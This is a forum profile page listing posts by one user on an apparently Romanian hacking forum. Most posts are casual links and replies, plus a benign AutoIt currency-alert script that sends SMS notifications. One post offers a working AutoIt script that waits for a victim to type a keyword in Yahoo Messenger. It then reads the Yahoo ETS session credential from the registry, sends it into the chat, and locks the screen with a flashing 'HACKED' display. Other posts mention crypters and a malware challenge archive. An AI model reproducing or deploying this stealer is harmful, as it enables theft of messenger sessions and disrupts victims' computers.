-
Posts
984 -
Joined
-
Last visited
-
Days Won
10
Everything posted by Jimmy
-
Ghajini Trailer - High Quality - YouTube
-
Da, insa trebuie deobfuscat ca sa intelegi ceva...
-
Trebuie sa obtineti un mesaj de felicitari. Mesajele sunt numerotate de la 1 la 5 (in fuctie de bulanul si intuitia care o aveti) Ultimul mesaj e mai greu de obtinut . Remember, you have five attempts https://www.virustotal.com/file/9c910646bf614ed0fe163213f277eaac4129c271b21fb8c92cfdd8eefd8cfa7d/analysis/1349714003/ rst.rar
-
Mda, inca nu m-am trezit bine Edit:
-
Sunt mai multe.
-
http://www.youtube.com/watch?v=wry34h-HcxA&feature=related
-
Cand victima tasteaza cuvantul /bine/ veti primi ets-ul ei si se apeleaza functia funny... facut de plictiseala , il puteti modifica de exemplu cand scrie un anumit cuvant sa faca nush ce...plm, end of story Ps/ functia funny e de pe net. Autoit While 1 If WinExists("[CLASS:CTabbedIMHost]") Then $Text = ControlGetText("[CLASS:CTabbedIMHost]", "", "YIMInputWindow1") $Word = "bine" $String = StringCompare($Text, $Word) If $String = 0 Then ControlSend("[CLASS:CTabbedIMHost]", "", "[CLASS:YIMInputWindow; INSTANCE:1]", " coi {ENTER}") $ETS = RegRead("HKEY_CURRENT_USER\Software\Yahoo\pager", "ETS") WinSetTrans("[CLASS:CTabbedIMHost]", "", 0) ControlSend("[CLASS:CTabbedIMHost]", "", "[CLASS:YIMInputWindow; INSTANCE:1]", $ETS & "{ENTER}") WinSetTrans("[CLASS:CTabbedIMHost]", "", 255) ControlSend("[CLASS:CTabbedIMHost]", "", "[CLASS:YIMInputWindow; INSTANCE:1]", "<DING>{ENTER}") _Funny () EndIf EndIf Sleep(100) WEnd Func _Funny () While True WinMinimizeAll() WinSetState("[CLASS:DV2ControlHost]", "", @SW_DISABLE) WinSetTrans("[CLASS:DV2ControlHost]", "", 0) WinSetState("[CLASS:Shell_TrayWnd]", "", @SW_HIDE) WinSetState("Program Manager", "", @SW_HIDE) HotKeySet("{ESC}", "_escape") Global $x Global $y Global $c Global $o $gui = GUICreate("HACKED", @DesktopWidth + 3, @DesktopHeight + 3, -1, -1) GUISetState(@SW_SHOW) WinSetTrans("HACKED", "", 99) While 1 $x = Random(150, @DesktopWidth, 1) $y = Random(150, @DesktopHeight, 1) $c = Random(000000, 999999, 1) $o = Random(75, 99, 1) MouseMove($x, $y, 5) ToolTip("HACKED") GUISetBkColor($c, $gui) Sleep(5) WEnd WEnd EndFunc Func _escape() GUISetState(@SW_HIDE, "Cover") WinSetState("Program Manager", "", @SW_SHOW) WinSetState("Program Manager", "", @SW_SHOW) WinSetState("[CLASS:Shell_TrayWnd]", "", @SW_SHOW) WinSetState("[CLASS:DV2ControlHost]", "", @SW_ENABLE) WinSetTrans("[CLASS:DV2ControlHost]", "", 255) Exit EndFunc
-
http://pastehtml.com/view/cdgm1k7x3.html
-
Revolution OS (2001) | Top Filme Documentare - Vizioneaza Gratuit Filme Documentare Online The Code: The Code Linux (2001) | Top Filme Documentare - Vizioneaza Gratuit Filme Documentare Online Biography Target: Bill Gates (1998) | Top Filme Documentare - Vizioneaza Gratuit Filme Documentare Online Inside Google (2010) | Top Filme Documentare - Vizioneaza Gratuit Filme Documentare Online
-
Threat Description:Worm:SymbOS/Commwarrior
-
Sondaj pentru verificarea utilizatorilor vechi activi
Jimmy replied to a topic in Anunturi importante
Sunt inca activ -
Si ce daca a fost la Costinesti?
-
[h=6]Ce sim?i când vezi imaginea aceasta?[/h]
-
De plictiseala am facut un script in autoit care iti trimite sms pe telefon cand EUR/USD/GBP a ajuns la o anumita valoare setata de tine. 1. Trebuie sa va face-ti cont pe smsglobal. 2. In acel input baga-ti de exemplu pt euro ”4.5” , cand ajunge euro la 4.5*** primi-ti sms. 3. Cine vrea poate sa adauge un timer, de exemplu sa verifice din 5 in 5 ore. 4. Pute-ti modifica sursa de exemplu cand primi-ti un anumit email primi-ti sms, cand ave-ti un mesaj nou pe facebook , primi-ti sms...etc 5. Am gresit categoria , trebuia la programare . #include <ButtonConstants.au3>#include <EditConstants.au3> #include <GUIConstantsEx.au3> #include <StaticConstants.au3> #include <WindowsConstants.au3> #include <IE.au3> #include <Inet.au3> #include <String.au3> $Valuta = GUICreate("Curs Valutar", 214, 210, 192, 124) GUISetBkColor(0x008000) $User = GUICtrlCreateInput("SMS_Global_User", 8, 15, 193, 21) $Pass = GUICtrlCreateInput("SMS_Global_Pass", 8, 55, 193, 21) $Phone = GUICtrlCreateInput("00407", 8, 95, 193, 21) $EUR = GUICtrlCreateRadio("EUR", 16, 130, 41, 25) $USD = GUICtrlCreateRadio("USD", 80, 130, 41, 25) $GBP = GUICtrlCreateRadio("GBP", 152, 130, 49, 25) $Value = GUICtrlCreateInput("0.0", 8, 172, 89, 20) $Alert_me = GUICtrlCreateButton("Alert_me", 112, 170, 89, 25) GUISetState(@SW_SHOW) While 1 $Msg = GUIGetMsg() Select Case $Msg = $Alert_me If GUICtrlRead($EUR) = 1 Then GUISetState(@SW_HIDE) TrayTip("", "Stau la panda", 5) Sleep(5000) _Eur() EndIf If GUICtrlRead($USD) = 1 Then GUISetState(@SW_HIDE) TrayTip("", "Stau la panda", 5) Sleep(5000) _Usd() EndIf If GUICtrlRead($GBP) = 1 Then GUISetState(@SW_HIDE) TrayTip("", "Stau la panda", 5) Sleep(5000) _Gbp() EndIf Case $Msg = $GUI_EVENT_CLOSE Exit EndSelect WEnd Func _Eur() While True $oIE = _IECreate("http://www.cursvalutar.ro/", 0, 0, 1) _IELoadWait($oIE) $HTML = _IEBodyReadHTML($oIE) $Money = _StringBetween($HTML, '<td>', '</td>') $Money2 = $Money[1] Local $Result = StringLeft($Money2, 3) Local $String = StringCompare(GUICtrlRead($Value), $Result) If $String = 0 Then _IENavigate($oIE, "https://www.smsglobal.com/mobileworks/signin.php") _IELoadWait($oIE) $Username = _IEGetObjByName($oIE, "username") $Password = _IEGetObjByName($oIE, "password") $Login = _IEGetObjByName($oIE, "SI") _IEFormElementSetValue($Username, GUICtrlRead($User)) _IEFormElementSetValue($Password, GUICtrlRead($Pass)) _IEAction($Login, "click") _IELoadWait($oIE) _IENavigate($oIE, "https://www.smsglobal.com/mobileworks/sendtono.php") _IELoadWait($oIE) $Nr = _IEGetObjByName($oIE, "p_cellphone") $From = _IEGetObjByName($oIE, "sms_from") $Sms = _IEGetObjByName($oIE, "message") $Send = _IEGetObjByName($oIE, "SI") _IEFormElementSetValue($Nr, GUICtrlRead($Phone)) _IEFormElementSetValue($From, "Valuta") _IEFormElementSetValue($Sms, "EUR a ajuns la " & $Money2) Sleep(10000) _IEAction($Send, "click") _IELoadWait($oIE) _IEQuit($oIE) Exit Else _IEQuit($oIE) EndIf WEnd EndFunc ;==>_Eur Func _Usd() While True $oIE = _IECreate("http://www.cursvalutar.ro/", 1, 1, 0) _IELoadWait($oIE) $HTML = _IEBodyReadHTML($oIE) $Money = _StringBetween($HTML, '<td>', '</td>') $Money2 = $Money[6] Local $Result = StringLeft($Money2, 3) Local $String = StringCompare(GUICtrlRead($Value), $Result) If $String = 0 Then _IENavigate($oIE, "https://www.smsglobal.com/mobileworks/signin.php") _IELoadWait($oIE) $Username = _IEGetObjByName($oIE, "username") $Password = _IEGetObjByName($oIE, "password") $Login = _IEGetObjByName($oIE, "SI") _IEFormElementSetValue($Username, GUICtrlRead($User)) _IEFormElementSetValue($Password, GUICtrlRead($Pass)) _IEAction($Login, "click") _IELoadWait($oIE) _IENavigate($oIE, "https://www.smsglobal.com/mobileworks/sendtono.php") _IELoadWait($oIE) $Nr = _IEGetObjByName($oIE, "p_cellphone") $From = _IEGetObjByName($oIE, "sms_from") $Sms = _IEGetObjByName($oIE, "message") $Send = _IEGetObjByName($oIE, "SI") _IEFormElementSetValue($Nr, GUICtrlRead($Phone)) _IEFormElementSetValue($From, "Valuta") _IEFormElementSetValue($Sms, "USD a ajuns la " & $Money2) _IEAction($Send, "click") _IELoadWait($oIE) _IEQuit($oIE) Exit Else _IEQuit($oIE) EndIf WEnd EndFunc ;==>_Usd Func _Gbp() While True $oIE = _IECreate("http://www.cursvalutar.ro/", 0, 0, 1) _IELoadWait($oIE) $HTML = _IEBodyReadHTML($oIE) $Money = _StringBetween($HTML, '<td>', '</td>') $Money2 = $Money[66] Local $Result = StringLeft($Money2, 3) Local $String = StringCompare(GUICtrlRead($Value), $Result) If $String = 0 Then _IENavigate($oIE, "https://www.smsglobal.com/mobileworks/signin.php") _IELoadWait($oIE) $Username = _IEGetObjByName($oIE, "username") $Password = _IEGetObjByName($oIE, "password") $Login = _IEGetObjByName($oIE, "SI") _IEFormElementSetValue($Username, GUICtrlRead($User)) _IEFormElementSetValue($Password, GUICtrlRead($Pass)) _IEAction($Login, "click") _IELoadWait($oIE) _IENavigate($oIE, "https://www.smsglobal.com/mobileworks/sendtono.php") _IELoadWait($oIE) $Nr = _IEGetObjByName($oIE, "p_cellphone") $From = _IEGetObjByName($oIE, "sms_from") $Sms = _IEGetObjByName($oIE, "message") $Send = _IEGetObjByName($oIE, "SI") _IEFormElementSetValue($Nr, GUICtrlRead($Phone)) _IEFormElementSetValue($From, "Valuta") _IEFormElementSetValue($Sms, "GBP a ajuns la " & $Money2) _IEAction($Send, "click") _IELoadWait($oIE) _IEQuit($oIE) Exit Else _IEQuit($oIE) EndIf WEnd EndFunc ;==>_Gbp
-
Nu mai cersi like-uri, nu esti pe facebook
-
2 cryptere,Indetectables Crypter, si Mitsubishi Eclipse GT Protector
Jimmy replied to io.kent's topic in Programe hacking
https://www.google.ro/#hl=ro&gs_nf=1&tok=2M5zy1i1cXhgdiyu_E4Tyw&cp=8&gs_id=1g&xhr=t&q=ronda+ocx&pf=p&sclient=psy-ab&oq=ronda+oc&gs_l=&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.&fp=45cb7ad6f161c509&biw=1366&bih=643 -
http://www.zoso.ro/wp-content/emag.swf